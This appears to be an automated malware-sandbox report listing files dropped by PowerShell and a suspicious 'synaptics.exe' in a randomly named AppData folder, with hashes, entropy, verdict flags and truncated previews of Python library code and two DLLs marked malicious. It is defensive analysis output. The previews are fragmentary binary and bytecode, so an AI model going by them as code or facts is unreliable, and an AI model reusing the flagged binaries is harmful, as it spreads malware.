                                                                                                                                                                                                            Preview:import argparse..import sys..from json import dumps..from os.path import abspath, basename, dirname, join, realpath..from platform import python_version..from typing import List, Optional..from unicodedata import unidata_version....import charset_normalizer.md as md_module..from charset_normalizer import from_fp..from charset_normalizer.models import CliDetectionResult..from charset_normalizer.version import __version__......def query_yes_no(question: str, default: str = "yes") -> bool:.. """Ask a yes/no question via input() and return their answer..... "question" is a string that is presented to the user... "default" is the presumed answer if the user just hits <Enter>... It must be "yes" (the default), "no" or None (meaning.. an answer is required of the user)..... The "answer" return value is True for "yes" or False for "no"..... Credit goes to (c) https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input.. """.. vali
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):292
                                                                                                                                                                                                            Entropy (8bit):5.052386803568706
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/Cke9zsZvDuQ4640995/n23d6xUArsQx6GCeOn4RD6f:CreGiWh/2IOQ8GCt4RD6f
                                                                                                                                                                                                            MD5:B84C29BB76FFD6EFEE0FF63D4F47E3DD
                                                                                                                                                                                                            SHA1:FAB67906F075289487762F6FA781F12BA89DB641
                                                                                                                                                                                                            SHA-256:C7D691C530548E9E9D716687201FEB5D20084633E12CA38BE93AF56D5F2F0C8E
                                                                                                                                                                                                            SHA-512:2BA2065E02337375BBBD490E6CF33C10F4EE1575340A3303EF547B3AEFC6844825DF10A6106D530ECA1A163BC0124DAD1B01A2FF630C19D57A5F8C5A9D0A5F8F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gj........................@...s....d.d.l.m.Z.m.Z...d.Z.d.S.)......)...cli_detect..query_yes_noN)...__main__r....r......__all__..r....r.....vC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\charset_normalizer/cli/__init__.py..<module>....s........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6761
                                                                                                                                                                                                            Entropy (8bit):5.805412847697645
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:c+pXpVFEjfjrAJPzF6GLiq2NOOzlDKRhukTb7:jXpyfA5PijNbKR0I
                                                                                                                                                                                                            MD5:816C0A703380CE17BEC10A3A9FC1C7AC
                                                                                                                                                                                                            SHA1:DD84DE391BE5ACBA4908A12FAEA5D3803A386EF8
                                                                                                                                                                                                            SHA-256:55B4EE7885CEA9ECE1E1665313D74B8E5F5F669AE36FEC266539FD5E7BB05D4F
                                                                                                                                                                                                            SHA-512:7C9F1CA8C53C79FC6568634613D16529490B8B51E10D6540D404A4D2B11449F77A4FE5BE2809675B138A1414B1A457B2859CC45293303520DDDECFF7265E5353
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.).......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.e.d.e.d.e.f.d.d...Z.d.d.e.e.e.....d.e.f.d.d...Z.e.d.k.rke.....d.S.d.S.)......N)...dumps)...abspath..basename..dirname..join..realpath)...python_version)...List..Optional)...unidata_version)...from_fp)...CliDetectionResult)...__version__..yes..question..default..returnc....................C...s....d.d.d.d.d.d...}.|.d.u.r.d.}.n.|.d.k.r.d.}.n.|.d.k.r.d.}.n.t.d.|.........t.j...|.|.......t.......}.|.d.u.r=|.d.k.r=|.|...S.|.|.v.rE|.|...S.t.j...d.....q$).a....Ask a yes/no question via input() and return their answer... "question" is a string that is presented to the user.. "default" is the presumed answer if the user just hits <Enter>.. It must be "yes" (the default), "no" or None (meaning. an answer is required of the user)... The "answer" return value is True for "yes" or False
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):42496
                                                                                                                                                                                                            Entropy (8bit):4.5059265769594825
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:wpR63vF6I6dA1qmi8ER7Gap8Rw89g/4u/A7pLP8A8vnmsFIGFz:463vH6dAUmikY5uI
                                                                                                                                                                                                            MD5:7CF670B0DAE081A3F6608E733A6AB1B8
                                                                                                                                                                                                            SHA1:87C1E03B85E521C2AB21BDDE31FE56069FA37D99
                                                                                                                                                                                                            SHA-256:31EEDADA87A59AC59FD50C71C79A656220401938BCD11B27A39BD8E49F0A08F0
                                                                                                                                                                                                            SHA-512:546146E14C0C082BBB63A91F872FD5C0F1577DEFBC68EE09D35D1A461502CA9163C7808EE69D3FCC008A81EF0DEAA331C97832D0DB0AD2D1491E6021B5F3DB72
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..from codecs import BOM_UTF8, BOM_UTF16_BE, BOM_UTF16_LE, BOM_UTF32_BE, BOM_UTF32_LE..from encodings.aliases import aliases..from re import IGNORECASE, compile as re_compile..from typing import Dict, List, Set, Union....# Contain for each eligible encoding a list of/item bytes SIG/BOM..ENCODING_MARKS: Dict[str, Union[bytes, List[bytes]]] = {.. "utf_8": BOM_UTF8,.. "utf_7": [.. b"\x2b\x2f\x76\x38",.. b"\x2b\x2f\x76\x39",.. b"\x2b\x2f\x76\x2b",.. b"\x2b\x2f\x76\x2f",.. b"\x2b\x2f\x76\x38\x2d",.. ],.. "gb18030": b"\x84\x31\x95\x33",.. "utf_32": [BOM_UTF32_BE, BOM_UTF32_LE],.. "utf_16": [BOM_UTF16_BE, BOM_UTF16_LE],..}....TOO_SMALL_SEQUENCE: int = 32..TOO_BIG_SEQUENCE: int = int(10e6)....UTF8_MAXIMAL_ALLOCATION: int = 1_112_064....# Up-to-date Unicode ucd/15.0.0..UNICODE_RANGES_COMBINED: Dict[str, range] = {.. "Control character": range(32),.. "Basic Latin": range(32, 128),.. "Latin-1 Supplement": range(1
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2392
                                                                                                                                                                                                            Entropy (8bit):4.7645536594211535
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:PjKiLw2Eppo2LYA5jYShiUB757v/bKnCjRi6kRqzBQJB7riYeJ0rG6wTW:7rLfEptLp0S/95773aWL0rG6wTW
                                                                                                                                                                                                            MD5:A4A705A8CC7C748CD8013D42F4F9FFFC
                                                                                                                                                                                                            SHA1:D113E8F62AE73BBC4103BC6C388AA5B5F12CFCB9
                                                                                                                                                                                                            SHA-256:E067649B0683952D592236AF8B277234B1B2E8D0469FC96CD8439C966AADCBB4
                                                                                                                                                                                                            SHA-512:F4BBA057386CB0BC1E449A92F7FD625F812D7A3DD60DBD47EAC38698DD0614674B41DA8798657ECABEFECF3C6E4415D3AD7F06B24EFA3FEEF7EDBCE709D5CF38
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import annotations....from typing import TYPE_CHECKING, Any, Optional..from warnings import warn....from .api import from_bytes..from .constant import CHARDET_CORRESPONDENCE....# TODO: remove this check when dropping Python 3.7 support..if TYPE_CHECKING:.. from typing_extensions import TypedDict.... class ResultDict(TypedDict):.. encoding: Optional[str].. language: str.. confidence: Optional[float]......def detect(.. byte_str: bytes, should_rename_legacy: bool = False, **kwargs: Any..) -> ResultDict:.. """.. chardet legacy method.. Detect the encoding of the given byte string. It should be mostly backward-compatible... Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it).. This function is deprecated and should be used to migrate your project easily, consult the documentation for.. further information. Not planned for removal..... :param byte_str: The byte sequence
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9216
                                                                                                                                                                                                            Entropy (8bit):5.166669305709444
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:JPYWSKhjgqskQnLRiSci6NIgjbLII6GFJGtjO+WCF5EMoMmGffQk/Ev:pYyhjgqiRpci7dTG+tjO+8nMVnu
                                                                                                                                                                                                            MD5:4036182951A4D673744301670D7D1891
                                                                                                                                                                                                            SHA1:5187FB71222387E91B62422C15837BB5B4AF27C1
                                                                                                                                                                                                            SHA-256:9C8117CBC6E3803E528EABEAC10F6C707E695CE372DD43C762052171F566716A
                                                                                                                                                                                                            SHA-512:E611B758F720FF36105F94BF961861BC3B21ACB91D9516121CEC6B7089898FFC71C172517258D5C8F07B365A654C4C36CE43BBC272DB5CF167ACEE2C010B6AE4
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.h.=...=...=...4..?...-"..?...v...?...-"..<...-"..7...-"..6.......>...=.......u#..<...u#..<...u#..<...u#..<...Rich=...................PE..L...7#.g...........!...)..................... ...............................`............@.........................P%..l....%..d....@.......................P.......!...............................!..@............ ..x............................text............................... ..`.rdata..0.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P......."..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20766
                                                                                                                                                                                                            Entropy (8bit):4.448647301839075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:X+NrqaBrMK0lzOXS4ZI7IRmVf/J9th/S/9/p/VnrgzfEz6zkzrD/UdBWgWHzW9kx:UrqaidOXhI7IRmV59LfKEqrlgWTTr
                                                                                                                                                                                                            MD5:F5D2439CDB9C5D7BFEE2804935079E98
                                                                                                                                                                                                            SHA1:7F974EB004276C33F88A2FF5404B74A0A5E79099
                                                                                                                                                                                                            SHA-256:0A8C1C771DC866C03426F57BF13E78993D06FEFE5F815D2BBB6BFF14F1071E1C
                                                                                                                                                                                                            SHA-512:F7832E1154E6311493AE770C4CCDEF6C361C16E8470E2D6CC3AC8EB608D8535663655B75054C4D1C5D1FC8D93EE5F9D2EC3DE46AC97EB2377446AA1AC8EC1ABB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from functools import lru_cache..from logging import getLogger..from typing import List, Optional....from .constant import (.. COMMON_SAFE_ASCII_CHARACTERS,.. TRACE,.. UNICODE_SECONDARY_RANGE_KEYWORD,..)..from .utils import (.. is_accentuated,.. is_arabic,.. is_arabic_isolated_form,.. is_case_variable,.. is_cjk,.. is_emoticon,.. is_hangul,.. is_hiragana,.. is_katakana,.. is_latin,.. is_punctuation,.. is_separator,.. is_symbol,.. is_thai,.. is_unprintable,.. remove_accent,.. unicode_range,..)......class MessDetectorPlugin:.. """.. Base abstract class used for mess detection plugins... All detectors MUST extend and implement given methods... """.... def eligible(self, character: str) -> bool:.. """.. Determine if given character should be fed in... """.. raise NotImplementedError # pragma: nocover.... def feed(self, character: str) -> None:.. """.. The main routine to
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):103424
                                                                                                                                                                                                            Entropy (8bit):6.504236255006893
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:WRaR2i6VKdQtv9cztNQSe19UzklEJ3wvm806R6IsIsPxDqmUXm:WlqQJSzQSe1XER4/06RCIgDqmUW
                                                                                                                                                                                                            MD5:31235A42A6C8E5943D6D0A1547E6BD76
                                                                                                                                                                                                            SHA1:3CFFD2867B10615A48FF18606A921DF5BD100AFD
                                                                                                                                                                                                            SHA-256:1C6F1650410346DAD59DC746C0CA7ADC82E0DAA3903A8115B54C160EAD89E73C
                                                                                                                                                                                                            SHA-512:1D533CED1641E4FBEBF1C45EFBD6820754271FAB457D5DC7E052AAF7598298AF0EC1AE2EDB7F18FA478CD834475B8290A3A31711E565DF583B19CD12EDD70931
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.f.P.5.P.5.P.5.()5.P.5..4.P.5.(.4.P.5..4.P.5..4.P.5..4.P.5E%.4.P.5.P.5hP.5..4.P.5..4.P.5..E5.P.5..4.P.5Rich.P.5........PE..L...7#.g...........!...)............@........0............................................@.........................Pe..`....e..x...............................$....a...............................a..@............0..@............................text............................... ..`.rdata...D...0...D..................@..@.data...` ...........Z..............@....rsrc................t..............@..@.reloc..$............v..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12784
                                                                                                                                                                                                            Entropy (8bit):4.488076639446243
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:tV0ShHbOSe118DeEUMAs3a0+WTRrQ9VG/fbtu:tV0COSe118DeEUMAwaXyrQ9VGHbtu
                                                                                                                                                                                                            MD5:4A5C048B5CA6DF1EEDC3895D7633109B
                                                                                                                                                                                                            SHA1:B8D05F04619F59EF340DDDDD25934537D5A3CA29
                                                                                                                                                                                                            SHA-256:54AEBA39D4A0CCE794E7F158514DB483F96E2DDE1EB944B586DE31B7BD0FE175
                                                                                                                                                                                                            SHA-512:C21B354FA3908D2319CEC450E5BB0B388829EE85EEA53108F11E53E3D6A8AA723B23DFBE2D291AABDABEB66480485110F83E99A80EFD90B095CCE67EAD00CBDC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from encodings.aliases import aliases..from hashlib import sha256..from json import dumps..from re import sub..from typing import Any, Dict, Iterator, List, Optional, Tuple, Union....from .constant import RE_POSSIBLE_ENCODING_INDICATION, TOO_BIG_SEQUENCE..from .utils import iana_name, is_multi_byte_encoding, unicode_range......class CharsetMatch:.. def __init__(.. self,.. payload: bytes,.. guessed_encoding: str,.. mean_mess_ratio: float,.. has_sig_or_bom: bool,.. languages: "CoherenceMatches",.. decoded_payload: Optional[str] = None,.. preemptive_declaration: Optional[str] = None,.. ):.. self._payload: bytes = payload.... self._encoding: str = guessed_encoding.. self._mean_mess_ratio: float = mean_mess_ratio.. self._languages: CoherenceMatches = languages.. self._has_sig_or_bom: bool = has_sig_or_bom.. self._unicode_ranges: Optional[List[str]] = None.... self._leaves: List[Cha
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12315
                                                                                                                                                                                                            Entropy (8bit):4.8657023319997865
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:x1b00QwX/GbGxPGuCvLjjKe9vIjp6JDvHwWTbCt04gKd7NW3wLVi8w0FN/4Cldw:xEW2WWrLSt04ZUAz3Fx4Cldw
                                                                                                                                                                                                            MD5:921C1C9D4EC51242C94566CB4A45FA39
                                                                                                                                                                                                            SHA1:3C69EA1CED33F8F2C362FE2FC9EE1717935FD0D8
                                                                                                                                                                                                            SHA-256:8E3BDF4971C90FA40F831731231E2EB6C385C773F116CB1679FD48631037B8AB
                                                                                                                                                                                                            SHA-512:F702B83A4FD7052A0204DAB95C6A5892B025511F1E626B30A368A1C99DDDCED733E24AA82B584981589C6BB05C7EB54D50CB3364208F243650F7416C4B9C6152
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import importlib..import logging..import unicodedata..from codecs import IncrementalDecoder..from encodings.aliases import aliases..from functools import lru_cache..from re import findall..from typing import Generator, List, Optional, Set, Tuple, Union....from _multibytecodec import MultibyteIncrementalDecoder....from .constant import (.. ENCODING_MARKS,.. IANA_SUPPORTED_SIMILAR,.. RE_POSSIBLE_ENCODING_INDICATION,.. UNICODE_RANGES_COMBINED,.. UNICODE_SECONDARY_RANGE_KEYWORD,.. UTF8_MAXIMAL_ALLOCATION,..)......@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION)..def is_accentuated(character: str) -> bool:.. try:.. description: str = unicodedata.name(character).. except ValueError:.. return False.. return (.. "WITH GRAVE" in description.. or "WITH ACUTE" in description.. or "WITH CEDILLA" in description.. or "WITH DIAERESIS" in description.. or "WITH CIRCUMFLEX" in description.. or "WITH TILDE" in description..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):85
                                                                                                                                                                                                            Entropy (8bit):4.483240648927213
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:IQVNHXL9vHutvyRnGLrF6qgHzB:ImbMVyRkF6fHzB
                                                                                                                                                                                                            MD5:E3228F0442AD18492B38D9EEFF66B8E6
                                                                                                                                                                                                            SHA1:549F848CD2957693BB4F34527AB8D12ACE8982A4
                                                                                                                                                                                                            SHA-256:C67DF8FF11125F9591A238E00C8EE47EE9501D81F8E37258C91D7C36CD4333C7
                                                                                                                                                                                                            SHA-512:29BDCE16C4F65056181FC1A81DF40EB419DC140C7F5E83F93DE8059F937E4A20E4810F8BD370D81F48FB0BCAF0F4E86126A0480C233FD6B05D11C13F8CDFD75B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""..Expose version.."""....__version__ = "3.4.0"..VERSION = __version__.split(".")..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):831
                                                                                                                                                                                                            Entropy (8bit):5.12030689783824
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CNSrJBifjefr9xLGmdChEYOcAMmXkOOs28s4qUUjOs28ssqU/Wfskzx5:dijeXL/whvOcAdtOb8fcjOb89mfD
                                                                                                                                                                                                            MD5:39496ADD4D3776235A09ABDC5B1D518A
                                                                                                                                                                                                            SHA1:B2AFD4136CA212ABF7E6E9D75ED6A20FD8DBE39A
                                                                                                                                                                                                            SHA-256:3AE648B56589B2EDC375C449BCA6D351275BA36DF48136E12D3DB43A6553D9D0
                                                                                                                                                                                                            SHA-512:322965F65F078A9A23E3E3D88895855C4605A1B27C0B9855A171CAFBC03FB4EDF2E9583A34BBA35ECD051D1B45E5C0F95B365F2430D0725758356E7498B3D0B3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gd........................@...st...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.S.)......)...IDNABidiError..IDNAError..InvalidCodepoint..InvalidCodepointContext..alabel..check_bidi..check_hyphen_ok..check_initial_combiner..check_label..check_nfc..decode..encode..ulabel..uts46_remap..valid_contextj..valid_contexto..valid_label_length..valid_string_length)...intranges_contain)...__version__).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...corer....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....Z.intrangesr....Z.package_datar......__all__..r....r.....JC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\idna\__init__.py..<module>....s....P.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9650
                                                                                                                                                                                                            Entropy (8bit):5.428234763936573
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:h+aGksQkLW/SjeyH/XfQ1BRXPzxhifuy83hhX0duXCX9R3YtkjR3frrDalgRTHrM:h+vksFLW/Sj7H/XfQ1BRXPtgGyQhhEU1
                                                                                                                                                                                                            MD5:66827233E5B5542F8093C2BD31E71700
                                                                                                                                                                                                            SHA1:E459BDF9B41FCC359996AB1D5B0840CBC6B6380B
                                                                                                                                                                                                            SHA-256:B5A4BE01A471F823EC4FEBC4C666580DE00B0686C32AD8FA4025FEE8B37B70E7
                                                                                                                                                                                                            SHA-512:A14A65031F36104B69E5C30741DBC04E7959395B775F6F85FEFCEEC12C2E3B64C070CAD8219D386FE125E644CF62982B6333CB746920C29ABAD875A5AB0B51C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.3.......................@...sf...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d...Z.d.e.e.e.f...d e.d.e.f.d!d"..Z.dEd.e.d$e.d.e.f.d%d&..Z.d.e.d.e.f.d'd(..Z.d.e.d.e.f.d)d*..Z.d.e.d.d.f.d+d,..Z d.e.d-e.d.e.f.d.d/..Z!dEd.e.d-e.d0e.d.e.f.d1d2..Z"d.e.e.e.e#f...d.d.f.d3d4..Z$d.e.d.e.f.d5d6..Z%d.e.e.e.e#f...d.e.f.d7d8..Z&dFd:e.d;e.d<e.d.e.f.d=d>..Z'.#.#.#.#dGd.e.e.e.e#f...d?e.d@e.d;e.d<e.d.e.f.dAdB..Z(.#.#.#dHd.e.e.e.e#f...d?e.d@e.d;e.d.e.f.dCdD..Z)d.S.)I.....N)...Optional..Union.....)...idnadata)...intranges_contain.....s....xn--u....[....]c....................@........e.Z.d.Z.d.Z.d.S.)...IDNAErrorz5Base exception for all IDNA-encoding related problemsN....__name__..__module__..__qualname__..__doc__..r....r.....FC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\idna\core.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):194427
                                                                                                                                                                                                            Entropy (8bit):3.531065831938883
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:bISwp+QvEzMUn3vDYYg/UuFD4RoC2Mo+4S+s8ecqmUM2UK+QQeky2uImLkgY88q/:bO+gEYUbYYgI
                                                                                                                                                                                                            MD5:17C26022440F91415F3D3B54AA5A3664
                                                                                                                                                                                                            SHA1:68460CC4C4E0CABC5951B140151879D848CDBE54
                                                                                                                                                                                                            SHA-256:F3B577B8FC54D5EE85EC21280829FDA47F5516473CB39DF413418B3B54D64BF0
                                                                                                                                                                                                            SHA-512:3DF2BE717DEEEC6C8B64703743C27CDCA8CC5A5AF5AEEDD3900E4AB5C0FDC3C517BAC47B90A90657090812EB2E5AC5380649F29A4898A08083CACBA0527AC15B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.1.......................@...s^\..d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):194427
                                                                                                                                                                                                            Entropy (8bit):3.531065831938883
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:bISwp+QvEzMUn3vDYYg/UuFD4RoC2Mo+4S+s8ecqmUM2UK+QQeky2uImLkgY88q/:bO+gEYUbYYgI
                                                                                                                                                                                                            MD5:17C26022440F91415F3D3B54AA5A3664
                                                                                                                                                                                                            SHA1:68460CC4C4E0CABC5951B140151879D848CDBE54
                                                                                                                                                                                                            SHA-256:F3B577B8FC54D5EE85EC21280829FDA47F5516473CB39DF413418B3B54D64BF0
                                                                                                                                                                                                            SHA-512:3DF2BE717DEEEC6C8B64703743C27CDCA8CC5A5AF5AEEDD3900E4AB5C0FDC3C517BAC47B90A90657090812EB2E5AC5380649F29A4898A08083CACBA0527AC15B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.1.......................@...s^\..d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):194427
                                                                                                                                                                                                            Entropy (8bit):3.531065831938883
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:bISwp+QvEzMUn3vDYYg/UuFD4RoC2Mo+4S+s8ecqmUM2UK+QQeky2uImLkgY88q/:bO+gEYUbYYgI
                                                                                                                                                                                                            MD5:17C26022440F91415F3D3B54AA5A3664
                                                                                                                                                                                                            SHA1:68460CC4C4E0CABC5951B140151879D848CDBE54
                                                                                                                                                                                                            SHA-256:F3B577B8FC54D5EE85EC21280829FDA47F5516473CB39DF413418B3B54D64BF0
                                                                                                                                                                                                            SHA-512:3DF2BE717DEEEC6C8B64703743C27CDCA8CC5A5AF5AEEDD3900E4AB5C0FDC3C517BAC47B90A90657090812EB2E5AC5380649F29A4898A08083CACBA0527AC15B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
